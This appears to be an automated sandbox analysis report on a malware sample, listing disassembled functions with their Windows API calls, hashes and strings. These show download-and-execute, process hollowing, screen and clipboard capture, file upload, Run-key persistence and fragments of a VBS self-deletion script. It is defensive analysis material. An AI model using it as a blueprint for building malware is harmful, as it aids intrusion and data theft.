Instruction ID: f4c76a25ae066abca739e86e51e7a0462eedc1fe756a7d18505f7f1389ca0f1f
Opcode Fuzzy Hash: 98882c3fb8c382ebf1d08c0d059c7b5ad1d191f9937145677da36107fcb1e2f7
Instruction Fuzzy Hash: E8515172900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0

Strings

C:\Users\user\Desktop\yaALNupJCH.exe, xrefs: 00407007, 0040712F
open, xrefs: 00406FB6

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Users\user\Desktop\yaALNupJCH.exe$open
API String ID: 2825088817-2142578241
Opcode ID: 2f3c64e68da1a3c475925c5fa33f393ed330c4fefede06b1ab4b2f3cd8cb2171
Instruction ID: e8f5d5918c01e45b9f58dfb5f701da15e03eec86fcc3d5a852d78a22cf403570
Opcode Fuzzy Hash: 2f3c64e68da1a3c475925c5fa33f393ed330c4fefede06b1ab4b2f3cd8cb2171
Instruction Fuzzy Hash: A761A071B0820156CA24FB76C8669BE77A99F81748F40093FF942772D2EE3C9905869F

Uniqueness

Uniqueness Score: -1.00%

Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

XPG, xrefs: 0040793A
XPG, xrefs: 00407877

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: XPG$XPG
API String ID: 4113138495-1962359302
Opcode ID: 5149e229ab00364da4007bffada40442c59a20ad82d668b232f60745ab4db98d
Instruction ID: 30f2f091d1745287e7c5bdc4e0ba67ea9086f55c29d946c5ca09ee25448eee69
Opcode Fuzzy Hash: 5149e229ab00364da4007bffada40442c59a20ad82d668b232f60745ab4db98d
Instruction Fuzzy Hash: 2D2186315043415BC314F761D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B

Uniqueness

Uniqueness Score: -1.00%

Function 0041C930 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CA25

Part of subcall function 004136BD: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004136CC
Part of subcall function 004136BD: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F7A1,004674B8,4.9.2 Pro), ref: 004136F4
Part of subcall function 004136BD: RegCloseKey.KERNEL32(?,?,?,0040F7A1,004674B8,4.9.2 Pro), ref: 004136FF

Strings

TileWallpaper, xrefs: 0041CA0F
Control Panel\Desktop, xrefs: 0041C96B, 0041C99E, 0041C9EE
WallpaperStyle, xrefs: 0041C970, 0041C9A3, 0041C9F3

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
Instruction ID: 79be2b8cdbb23de21057fc337ed2e77d7a8ad64980aeb84def733d201678bbd2
Opcode Fuzzy Hash: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
Instruction Fuzzy Hash: 23119DB2BC025032D918353A1D9BBBE28129757F51F9101ABF6023E3C6E9CF0A9146CF

Uniqueness

Uniqueness Score: -1.00%

Function 00451C19 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004449B3,?,?,?,?,?,?,00000004), ref: 00451CFB
_wcschr.LIBVCRUNTIME ref: 00451D8B
_wcschr.LIBVCRUNTIME ref: 00451D99
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004449B3,00000000,00444AD3), ref: 00451E3C

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 14a764fd6ed12dfdcaa65424ebdbb9bd7c0f192dfb7e073e066ce26d79732a85
Instruction ID: 14b133ae5c81331acca561b47ce8062aaa11cc7e398ae8fc4233077d85e48ad0
Opcode Fuzzy Hash: 14a764fd6ed12dfdcaa65424ebdbb9bd7c0f192dfb7e073e066ce26d79732a85
Instruction Fuzzy Hash: 45610A71600205AAE725AB36CC46BAB73A8EF04306F14442FFD05D7292EB79ED48C768

Uniqueness

Uniqueness Score: -1.00%

Function 00452004 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

Part of subcall function 004480D5: _free.LIBCMT ref: 00448134
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 00448141

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452058
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004520A9
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452169

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: 7f6a73b4c1a337f8cdfffcc3746213a0a2295b303bf7df5f7f28e86f06d27cc4
Instruction ID: 532fc222645340eff7d03ca33bc0d43134e9c9b1347fe7fb292f935410b2db51
Opcode Fuzzy Hash: 7f6a73b4c1a337f8cdfffcc3746213a0a2295b303bf7df5f7f28e86f06d27cc4
Instruction Fuzzy Hash: 9661C6715006079BDB289F24CD81B7B77A8EF16306F1440BBED05C6642E7BCD989CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00433785 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,0043340D,00000034,?,?,00000000), ref: 00433797
CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004334A0,00000000,?,00000000), ref: 004337AD
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004334A0,00000000,?,00000000,0041E19F), ref: 004337BF

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction ID: d57451560084938dac3e894a0bfac24fee6c04dd763756b664d54862db7b60e1
Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction Fuzzy Hash: F7E09AB1208310FEFB300F21EC08F673AA4EB89F72F204A3AF651E41E4D7668901861D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B65C Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0040B65F
GetClipboardData.USER32 ref: 0040B66B
CloseClipboard.USER32 ref: 0040B673

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: 519ef2c27197b8d96ba826a5c3e8c472a064a98dfaa986ceeee74c7c82622cfa
Instruction ID: 12cbdee9a8fd4f9d33682b6f823f9a7816142bf9e60be8ebe326d1ace0c113b9
Opcode Fuzzy Hash: 519ef2c27197b8d96ba826a5c3e8c472a064a98dfaa986ceeee74c7c82622cfa
Instruction Fuzzy Hash: E6E08C30205320EFC2205B609C0CB8A67509F85B52F024A3ABC85AA2D0DB39CC00C6AE

Uniqueness

Uniqueness Score: -1.00%

Function 00451EDC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

EnumSystemLocalesW.KERNEL32(00452004,00000001,00000000,?,004449AC,?,00452631,00000000,?,?,?), ref: 00451F4E

Strings

1&E, xrefs: 00451F23

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: 1&E
API String ID: 1084509184-528507022
Opcode ID: 6042bf35db955c8155168cdea4bd964db26141be6ffdfaba86cbec483356b97a
Instruction ID: 7ccab57252c86bdbc2332e9d9a1a7588b25c389669ebfe4ed4bb9db7d5cf98d5
Opcode Fuzzy Hash: 6042bf35db955c8155168cdea4bd964db26141be6ffdfaba86cbec483356b97a
Instruction Fuzzy Hash: 911148372003059FDB189F39C8916BBB791FF80369B14442EED8687B51D775B906C744

Uniqueness

Uniqueness Score: -1.00%

Function 004487AD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 00448800

Strings

GetLocaleInfoEx, xrefs: 004487C8

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 34b462f6e5987f68bc3ca5e2a1c359985bc317571eb71942286ac193dfa3ab1f
Instruction ID: 59b7edac1ee3b9a1fc61ec009b02a66a74686443aee658c776b66ba69a57392f
Opcode Fuzzy Hash: 34b462f6e5987f68bc3ca5e2a1c359985bc317571eb71942286ac193dfa3ab1f
Instruction Fuzzy Hash: 03F02B31A00308F7DB01AF61DC01FAE7B61DF04712F10456EFC0526262CE759D159A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00452254 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

Part of subcall function 004480D5: _free.LIBCMT ref: 00448134
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 00448141

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 7fba601ea237378da0a977c6d17b643b08c3bbb2c23d121bede84fc2343487d0
Instruction ID: 4fe845b936be1eb8fdcbb114edd566682b4e2bd66d9e4785f410dba98d0612dd
Opcode Fuzzy Hash: 7fba601ea237378da0a977c6d17b643b08c3bbb2c23d121bede84fc2343487d0
Instruction Fuzzy Hash: FA21A172510206ABDB249E25DD41ABB73A8EF46316F1001BBFD05C6242EBBC9D49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00452484 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452222,00000000,00000000,?), ref: 004524B0

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 9d656f9379a7b598a5a8f503f6b0d832b9571a3900ff8c3681835d602033eb24
Instruction ID: f34ea85dd6e778248c48bb084e231636f9c5f88c26065830af7cae6304855a84
Opcode Fuzzy Hash: 9d656f9379a7b598a5a8f503f6b0d832b9571a3900ff8c3681835d602033eb24
Instruction Fuzzy Hash: A3F04932610115BBEB249A258D05BBB7758EB42329F05442BEC05A3641EABCFD09C6D8

Uniqueness

Uniqueness Score: -1.00%

Function 00451F77 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

EnumSystemLocalesW.KERNEL32(00452254,00000001,?,?,004449AC,?,004525F5,004449AC,?,?,?,?,?,004449AC,?,?), ref: 00451FC3

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 70517d43b4834d2b39e75724c999b3c1fcf492dd8bbf48b98f78387c5afd5eb7
Instruction ID: faa2e26f21619674753b63803d444ebcdc18fb653b9977e4b6b54c84cafa8984
Opcode Fuzzy Hash: 70517d43b4834d2b39e75724c999b3c1fcf492dd8bbf48b98f78387c5afd5eb7
Instruction Fuzzy Hash: 2BF022363043086FDB145F3A9881B7BBB94EF80329F05442EFE058B691D7B5DC06C644

Uniqueness

Uniqueness Score: -1.00%

Function 004482C4 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004457C8: EnterCriticalSection.KERNEL32(-0006D41D,?,00442F1B,00000000,0046E928,0000000C,00442ED6,?,?,?,00445A66,?,?,0044818A,00000001,00000364), ref: 004457D7

EnumSystemLocalesW.KERNEL32(0044827E,00000001,0046EAD0,0000000C), ref: 004482FC

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 4b03c8790a3543633605fcd17a66047c3d30e6fd317312de70b0945699c1eca3
Instruction ID: 3e0b6544518826b1513a4e636f39db4c7c6778963d5a3a3654a3fb2fc2b31fc3
Opcode Fuzzy Hash: 4b03c8790a3543633605fcd17a66047c3d30e6fd317312de70b0945699c1eca3
Instruction Fuzzy Hash: E0F04435550200EFEB04EF69D946B4D77E0EB04725F10456AF414DB2A2CB7889808B59

Uniqueness

Uniqueness Score: -1.00%

Function 00451E91 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

EnumSystemLocalesW.KERNEL32(00451DE8,00000001,?,?,?,00452653,004449AC,?,?,?,?,?,004449AC,?,?,?), ref: 00451EC8

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 0f27a19467b537bc2edb91f12de862bc09ba8748d1eb205a07958a60be29cb7c
Instruction ID: f3168094b20094f9071e390e10ad46a9319e24188657ea19079ada7b49c20968
Opcode Fuzzy Hash: 0f27a19467b537bc2edb91f12de862bc09ba8748d1eb205a07958a60be29cb7c
Instruction Fuzzy Hash: CDF0553630020867CB04AF36C846B6BBF90EFC2722F06405EEE058B262C63AD846C754

Uniqueness

Uniqueness Score: -1.00%

Function 00418DC4 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418DDE
CreateCompatibleDC.GDI32(00000000), ref: 00418DEB

Part of subcall function 00419273: EnumDisplaySettingsW.USER32 ref: 004192A3

CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418E61
DeleteDC.GDI32(00000000), ref: 00418E78
DeleteDC.GDI32(00000000), ref: 00418E7B
DeleteObject.GDI32(00000000), ref: 00418E7E
SelectObject.GDI32(00000000,00000000), ref: 00418E9F
DeleteDC.GDI32(00000000), ref: 00418EB0
DeleteDC.GDI32(00000000), ref: 00418EB3
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418ED7
GetIconInfo.USER32(?,?), ref: 00418F0B
DeleteObject.GDI32(?), ref: 00418F3A
DeleteObject.GDI32(?), ref: 00418F47
DrawIcon.USER32 ref: 00418F54
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00418F8A
GetObjectA.GDI32(00000000,00000018,?), ref: 00418FB6
LocalAlloc.KERNEL32(00000040,00000001), ref: 00419023
GlobalAlloc.KERNEL32(00000000,?), ref: 00419092
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004190B6
DeleteDC.GDI32(?), ref: 004190CA
DeleteDC.GDI32(00000000), ref: 004190CD
DeleteObject.GDI32(00000000), ref: 004190D0
GlobalFree.KERNEL32 ref: 004190DB
DeleteObject.GDI32(00000000), ref: 0041918F
GlobalFree.KERNEL32 ref: 00419196
DeleteDC.GDI32(?), ref: 004191A6
DeleteDC.GDI32(00000000), ref: 004191B1

Strings

DISPLAY, xrefs: 00418DD7

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
String ID: DISPLAY
API String ID: 479521175-865373369
Opcode ID: 54eda4c38d6e83943b933f0922487bdf4f9de85190a38fb7e1d9866d6738ab1c
Instruction ID: e7c3367f6c681fa8515d566fd421d68283470b6e3bdb4c9c352ce811123ef30b
Opcode Fuzzy Hash: 54eda4c38d6e83943b933f0922487bdf4f9de85190a38fb7e1d9866d6738ab1c
Instruction Fuzzy Hash: 0FC14971508301AFD7209F25DC44BABBBE9EB88755F00482EF98993291DB34ED45CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0041803D Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418084
GetProcAddress.KERNEL32(00000000), ref: 00418087
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418098
GetProcAddress.KERNEL32(00000000), ref: 0041809B
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004180AC
GetProcAddress.KERNEL32(00000000), ref: 004180AF
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004180C0
GetProcAddress.KERNEL32(00000000), ref: 004180C3
CreateProcessW.KERNEL32 ref: 00418165
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041817D
GetThreadContext.KERNEL32(?,00000000), ref: 00418193
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004181B9
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041823B
TerminateProcess.KERNEL32(?,00000000), ref: 0041824F
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041828F
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418359
SetThreadContext.KERNEL32(?,00000000), ref: 00418376
ResumeThread.KERNEL32(?), ref: 00418383
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041839A
GetCurrentProcess.KERNEL32(?), ref: 004183A5
TerminateProcess.KERNEL32(?,00000000), ref: 004183C0
GetLastError.KERNEL32 ref: 004183C8

Strings

ntdll, xrefs: 0041806F, 0041808E, 004180A2, 004180B6
ZwClose, xrefs: 004180B1
ZwMapViewOfSection, xrefs: 00418089
ZwUnmapViewOfSection, xrefs: 0041809D
ZwCreateSection, xrefs: 0041806A

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
API String ID: 4188446516-3035715614
Opcode ID: 351650298d540e07d33211bf4070d990af1111825dfb992b7f52e155835243ae
Instruction ID: 4b3dbf9c3380ce27638f34cb54b94d9f6342d2977b347f3e8d94ef5a61c839a9
Opcode Fuzzy Hash: 351650298d540e07d33211bf4070d990af1111825dfb992b7f52e155835243ae
Instruction Fuzzy Hash: CBA17E70604305EFDB209F64DD85BAB7BE8FB48705F04082EF699D6291DB79D844CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D36E Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041279E: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F816), ref: 004127AE
Part of subcall function 0041279E: WaitForSingleObject.KERNEL32(000000FF), ref: 004127C1

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D46B
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D47E
SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D497
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D4C7

Part of subcall function 0040B7FA: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D006,004752D8,004752F0,?,pth_unenc), ref: 0040B809
Part of subcall function 0040B7FA: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B815
Part of subcall function 0040B7FA: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B823

Part of subcall function 0041C33F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D347,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C37E

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D712
ExitProcess.KERNEL32 ref: 0040D71E

Strings

fso.DeleteFile ", xrefs: 0040D588
dMG, xrefs: 0040D3A9
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D6C1
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D410
exepath, xrefs: 0040D445
""", 0, xrefs: 0040D635
0qF, xrefs: 0040D685, 0040D6C6, 0040D5AF, 0040D5DC
Temp, xrefs: 0040D4CE
8SG, xrefs: 0040D41D
fso.DeleteFolder ", xrefs: 0040D5F9
\update.vbs, xrefs: 0040D4C9
On Error Resume Next, xrefs: 0040D507
while fso.FileExists(", xrefs: 0040D53A
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D3BF
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D64F
0qF, xrefs: 0040D6DA, 0040D6E5
"), xrefs: 0040D523
open, xrefs: 0040D70C
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D4F8
wend, xrefs: 0040D5D7

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
